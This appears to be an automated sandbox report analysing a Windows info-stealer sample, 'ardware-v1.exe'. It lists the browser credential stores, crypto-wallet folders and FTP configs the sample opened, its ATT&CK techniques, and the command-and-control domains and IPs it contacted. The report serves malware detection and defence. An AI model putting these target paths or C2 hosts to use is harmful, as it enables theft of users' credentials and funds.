                Source: C:\Users\user\Desktop\ardware-v1.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
                Source: C:\Users\user\Desktop\ardware-v1.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
                Source: C:\Users\user\Desktop\ardware-v1.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite
                Source: C:\Users\user\Desktop\ardware-v1.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
                Source: C:\Users\user\Desktop\ardware-v1.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
                Source: C:\Users\user\Desktop\ardware-v1.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.db
                Source: C:\Users\user\Desktop\ardware-v1.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exe | Directory queried: C:\Users\user\Documents
                Source: C:\Users\user\Desktop\ardware-v1.exe | Directory queried: C:\Users\user\Documents\BJZFPPWAPT
                Source: C:\Users\user\Desktop\ardware-v1.exe | Directory queried: C:\Users\user\Documents\CZQKSDDMWR
                Source: C:\Users\user\Desktop\ardware-v1.exe | Directory queried: C:\Users\user\Documents\EWZCVGNOWT
                Source: C:\Users\user\Desktop\ardware-v1.exe | Directory queried: C:\Users\user\Documents\GIGIYTFFYT
                Source: C:\Users\user\Desktop\ardware-v1.exe | Directory queried: C:\Users\user\Documents\PALRGUCVEH
                Source: C:\Users\user\Desktop\ardware-v1.exe | Directory queried: C:\Users\user\Documents\ZIPXYXWIOY
                Source: C:\Users\user\Desktop\ardware-v1.exe | Directory queried: number of queries: 1001
                Source: Yara match | File source: 00000000.00000003.3121711204.0000000000B05000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000003.3120968564.0000000000B03000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000003.3121039700.0000000000A85000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000003.3121763569.0000000000A85000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: Process Memory Space: ardware-v1.exe PID: 1972, type: MEMORYSTR

                Remote Access Functionality

                Source: Yara match | File source: sslproxydump.pcap, type: PCAP
                Source: Yara match | File source: decrypted.memstr, type: MEMORYSTR
                Source: Yara match | File source: Process Memory Space: ardware-v1.exe PID: 1972, type: MEMORYSTR
                MITRE ATT&CK Matrix (per tactic; the number in parentheses is the count shown next to the technique in the report)

                Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information
                Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server
                Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts
                Execution: Windows Management Instrumentation (2); PowerShell (1); At; Cron; Launchd
                Persistence: DLL Side-Loading (1); Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script
                Privilege Escalation: DLL Side-Loading (1); Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script
                Defense Evasion: Virtualization/Sandbox Evasion (11); Deobfuscate/Decode Files or Information (1); Obfuscated Files or Information (1); DLL Side-Loading (1); Software Packing
                Credential Access: OS Credential Dumping (2); LSASS Memory; Security Account Manager; NTDS; LSA Secrets
                Discovery: Security Software Discovery (121); Virtualization/Sandbox Evasion (11); Process Discovery (1); File and Directory Discovery (2); System Information Discovery (22)
                Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH
                Collection: Archive Collected Data (1); Data from Local System (41); Data from Network Shared Drive; Input Capture; Keylogging
                Command and Control: Encrypted Channel (11); Ingress Tool Transfer (1); Non-Application Layer Protocol (3); Application Layer Protocol (114); Fallback Channels
                Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer
                Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact

                Source | Detection | Scanner
                ardware-v1.exe | 15% | Virustotal
                ardware-v1.exe | 24% | ReversingLabs
                No Antivirus matches
                                                                                                      high
                                                                                                      https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ardware-v1.exe, 00000000.00000003.3001837949.0000000000AF9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&amp;l=englardware-v1.exe, 00000000.00000003.3001837949.0000000000AF9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=fe66ET2uI50l&amp;l=englisardware-v1.exe, 00000000.00000003.3001837949.0000000000B01000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3001837949.0000000000AF9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbCardware-v1.exe, 00000000.00000003.3001837949.0000000000B01000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3001837949.0000000000AF9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              https://diffuculttan.xyz/apiardware-v1.exe, 00000000.00000003.3002259229.0000000000A90000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                https://s.ytimg.com;ardware-v1.exe, 00000000.00000003.3001837949.0000000000AF9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=0Xxxardware-v1.exe, 00000000.00000003.3121763569.0000000000AE0000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3002259229.0000000000AE0000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3001837949.0000000000B01000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3199466925.0000000000AE0000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3027684037.0000000000AE0000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3001837949.0000000000AF9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    https://lev-tolstoi.com/eardware-v1.exe, 00000000.00000003.3152887612.0000000000B03000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3165739361.0000000000B09000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3120968564.0000000000B03000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3121711204.0000000000B05000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    • Avira URL Cloud: safe
                                                                                                                    unknown
                                                                                                                    https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1ardware-v1.exe, 00000000.00000003.3002259229.0000000000AE0000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3001837949.0000000000B01000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3001837949.0000000000AF9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&amp;l=english&ardware-v1.exe, 00000000.00000003.3001837949.0000000000B01000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3001837949.0000000000AF9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        https://community.fastly.steamstatic.com/ardware-v1.exe, 00000000.00000003.3001837949.0000000000AF9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          https://steam.tv/ardware-v1.exe, 00000000.00000003.3001837949.0000000000AF9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            http://ocsp.sectigo.com00ardware-v1.exefalse
                                                                                                                            • Avira URL Cloud: safe
                                                                                                                            unknown
                                                                                                                            https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&amp;l=enardware-v1.exe, 00000000.00000003.3001837949.0000000000B01000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3001837949.0000000000AF9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              https://lev-tolstoi.com/ardware-v1.exe, ardware-v1.exe, 00000000.00000003.3152887612.0000000000B03000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3027817857.0000000000B00000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3027684037.0000000000AF3000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3001707867.0000000000B0B000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000002.3220131253.0000000000A56000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3219399245.0000000000A56000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              • Avira URL Cloud: safe
                                                                                                                              unknown
                                                                                                                              http://store.steampowered.com/privacy_agreement/ardware-v1.exe, 00000000.00000003.3121763569.0000000000AE0000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3002259229.0000000000AE0000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3001837949.0000000000B01000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3199466925.0000000000AE0000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3027684037.0000000000AE0000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3001837949.0000000000AF9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                https://wrathful-jammy.cyou/ardware-v1.exe, 00000000.00000003.3002259229.0000000000A90000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3027684037.0000000000A90000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  https://community.fastly.steamstatic.comardware-v1.exe, 00000000.00000003.3027817857.0000000000B00000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3027684037.0000000000AF3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    https://store.steampowered.com/points/shop/ardware-v1.exe, 00000000.00000003.3001837949.0000000000B01000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      high
                                                                                                                                      https://awake-weaves.cyou/apiiardware-v1.exe, 00000000.00000003.3002259229.0000000000A90000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      • Avira URL Cloud: malware
                                                                                                                                      unknown
                                                                                                                                      https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=ardware-v1.exe, 00000000.00000003.3028706010.0000000003540000.00000004.00000800.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3028628315.0000000003540000.00000004.00000800.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3028528667.0000000003543000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        high
                                                                                                                                        http://crl.rootca1.amazontrust.com/rootca1.crl0ardware-v1.exe, 00000000.00000003.3087715098.00000000035B9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          high
                                                                                                                                          https://lev-tolstoi.com/S$_ardware-v1.exe, 00000000.00000003.3165739361.0000000000B09000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000002.3220377996.0000000000B16000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3219663719.0000000000B15000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                          unknown
                                                                                                                                          http://ocsp.rootca1.amazontrust.com0:ardware-v1.exe, 00000000.00000003.3087715098.00000000035B9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            high
                                                                                                                                            https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&amp;l=english&aardware-v1.exe, 00000000.00000003.3001837949.0000000000B01000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3001837949.0000000000AF9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              high
                                                                                                                                              https://sketchfab.comardware-v1.exe, 00000000.00000003.3001837949.0000000000AF9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                high
                                                                                                                                                https://www.ecosia.org/newtab/ardware-v1.exe, 00000000.00000003.3028706010.0000000003540000.00000004.00000800.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3028628315.0000000003540000.00000004.00000800.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3028528667.0000000003543000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  https://lv.queniujq.cnardware-v1.exe, 00000000.00000003.3001837949.0000000000AF9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    https://steamcommunity.com/profiles/76561199724331900/inventory/ardware-v1.exe, 00000000.00000003.3002259229.0000000000AE0000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3001837949.0000000000B01000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3001837949.0000000000AF9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brardware-v1.exe, 00000000.00000003.3088801564.0000000003825000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                        high
                                                                                                                                                        https://www.youtube.com/ardware-v1.exe, 00000000.00000003.3001837949.0000000000AF9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          high
                                                                                                                                                          https://community.fastJardware-v1.exe, 00000000.00000003.3027817857.0000000000B00000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3027684037.0000000000AF3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                          unknown
                                                                                                                                                          https://store.steampowered.com/privacy_agreement/ardware-v1.exe, 00000000.00000003.3001837949.0000000000B01000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            high
                                                                                                                                                            https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&amp;l=engardware-v1.exe, 00000000.00000003.3001837949.0000000000B01000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3001837949.0000000000AF9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                              high
                                                                                                                                                              https://wrathful-jammy.cyou/DI;ardware-v1.exe, 00000000.00000003.3002259229.0000000000A90000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                              • Avira URL Cloud: malware
                                                                                                                                                              unknown
                                                                                                                                                              https://sordid-snaked.cyou/sardware-v1.exe, 00000000.00000002.3220131253.0000000000A56000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3219399245.0000000000A56000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                              • Avira URL Cloud: malware
                                                                                                                                                              unknown
                                                                                                                                                              https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&amp;l=english&amardware-v1.exe, 00000000.00000003.3001837949.0000000000B01000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3001837949.0000000000AF9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                high
                                                                                                                                                                https://www.google.com/recaptcha/ardware-v1.exe, 00000000.00000003.3001837949.0000000000AF9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                  high
                                                                                                                                                                  https://checkout.steampowered.com/ardware-v1.exe, 00000000.00000003.3001837949.0000000000AF9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                    high
                                                                                                                                                                    https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&refardware-v1.exe, 00000000.00000003.3089363104.0000000003596000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                      high
                                                                                                                                                                      https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477ardware-v1.exe, 00000000.00000003.3089363104.0000000003596000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                        high
                                                                                                                                                                        https://lev-tolstoi.com/teardware-v1.exe, 00000000.00000003.3152887612.0000000000B03000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3165739361.0000000000B09000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000002.3220377996.0000000000B16000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3219663719.0000000000B15000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                                        unknown
                                                                                                                                                                        https://community.fastly.steamstatic.com/public/javascript/applications/community/main.js?v=THDq-gsQardware-v1.exe, 00000000.00000003.3121763569.0000000000AE0000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3002259229.0000000000AE0000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3001837949.0000000000B01000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3199466925.0000000000AE0000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3027684037.0000000000AE0000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3001837949.0000000000AF9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                          high
                                                                                                                                                                          https://store.steampowered.com/;ardware-v1.exe, 00000000.00000003.3001837949.0000000000AF9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                            high
                                                                                                                                                                            https://store.steampowered.com/about/ardware-v1.exe, 00000000.00000003.3001837949.0000000000B01000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                              high
                                                                                                                                                                              https://steamcommunity.com/my/wishlist/ardware-v1.exe, 00000000.00000003.3001837949.0000000000B01000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                high
                                                                                                                                                                                https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&amp;ardware-v1.exe, 00000000.00000003.3001837949.0000000000B01000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3001837949.0000000000AF9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                  high
                                                                                                                                                                                  http://ocsp.sectigo.com0ardware-v1.exefalse
                                                                                                                                                                                    high
https://help.steampowered.com/en/
  Source: ardware-v1.exe, 00000000.00000003.3001837949.0000000000B01000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false | Reputation: high

https://steamcommunity.com/market/
  Source: ardware-v1.exe, 00000000.00000003.3001837949.0000000000B01000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false | Reputation: high

https://store.steampowered.com/news/
  Source: ardware-v1.exe, 00000000.00000003.3001837949.0000000000B01000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false | Reputation: high

https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
  Source: ardware-v1.exe, 00000000.00000003.3089363104.0000000003596000.00000004.00000800.00020000.00000000.sdmp
  Malicious: false | Reputation: high

http://cert.ssl.com/SSL.com-timeStamping-I-RSA-R1.cer0Q
  Source: ardware-v1.exe
  Malicious: false | Reputation: high

https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
  Source: ardware-v1.exe, 00000000.00000003.3028706010.0000000003540000.00000004.00000800.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3028628315.0000000003540000.00000004.00000800.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3028528667.0000000003543000.00000004.00000800.00020000.00000000.sdmp
  Malicious: false | Reputation: high

https://lev-tolstoi.com/apim
  Source: ardware-v1.exe, 00000000.00000003.3027684037.0000000000A90000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false | Detection: Avira URL Cloud: safe | Reputation: unknown

http://store.steampowered.com/subscriber_agreement/
  Source: ardware-v1.exe, 00000000.00000003.3121763569.0000000000AE0000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3002259229.0000000000AE0000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3001837949.0000000000B01000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3199466925.0000000000AE0000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3027684037.0000000000AE0000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3001837949.0000000000AF9000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false | Reputation: high

http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
  Source: ardware-v1.exe
  Malicious: false | Reputation: high

https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
  Source: ardware-v1.exe, 00000000.00000003.3121763569.0000000000AE0000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3002259229.0000000000AE0000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3001837949.0000000000B01000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3199466925.0000000000AE0000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3027684037.0000000000AE0000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3001837949.0000000000AF9000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false | Reputation: high

https://recaptcha.net/recaptcha/;
  Source: ardware-v1.exe, 00000000.00000003.3001837949.0000000000AF9000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false | Reputation: high

https://lev-tolstoi.com/uo
  Source: ardware-v1.exe, 00000000.00000002.3220377996.0000000000B16000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3219663719.0000000000B15000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false | Detection: Avira URL Cloud: safe | Reputation: unknown

https://steamcommunity.com/discussions/
  Source: ardware-v1.exe, 00000000.00000003.3001837949.0000000000B01000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false | Reputation: high

https://store.steampowered.com/stats/
  Source: ardware-v1.exe, 00000000.00000003.3001837949.0000000000B01000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false | Reputation: high

https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=Gr6TbGRvDtNE&am
  Source: ardware-v1.exe, 00000000.00000003.3001837949.0000000000B01000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3001837949.0000000000AF9000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false | Reputation: high
IP | Domain | Country | ASN | ASN Name | Malicious
172.67.157.254 | lev-tolstoi.com | United States | 13335 | CLOUDFLARENETUS | true
45.77.249.79 | immureprech.biz | United States | 20473 | AS-CHOOPAUS | false
23.55.153.106 | steamcommunity.com | United States | 20940 | AKAMAI-ASN1EU | false
104.131.68.180 | deafeninggeh.biz | United States | 14061 | DIGITALOCEAN-ASNUS | false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1577233
Start date and time: 2024-12-18 09:50:08 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 5m 35s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 4
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: ardware-v1.exe
Detection: MAL
Classification: mal96.troj.spyw.evad.winEXE@1/0@13/4
EGA Information: Failed
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 0
• Number of non-executed functions: 3
Cookbook Comments:
• Found application associated with file extension: .exe
• Excluded processes from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
• Excluded IPs from analysis (whitelisted): 13.107.246.63, 4.245.163.56
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target ardware-v1.exe, PID 1972, because there are no executed functions
• Report size getting too big: too many NtOpenKeyEx calls found.
• Report size getting too big: too many NtQueryDirectoryFile calls found.
• Report size getting too big: too many NtQueryValueKey calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
03:52:22 | API Interceptor | 13x Sleep call for process: ardware-v1.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
172.67.157.254 | https://t.co/nq9BYOxCg9 | malicious | HTMLPhisher |
45.77.249.79 | UoktqWamLR.exe | malicious | AZORult | ehzwq.shop/erd/mac/index.php
45.77.249.79 | RgZaLjgCto.exe | malicious | Tinba | uyhgqunqkxnx.pw/EiDQjNbWEQ/
45.77.249.79 | java.exe | malicious | Tinba | uyhgqunqkxnx.pw/EiDQjNbWEQ/
23.55.153.106 | sNWQ2gC6if.exe | malicious | LummaC |
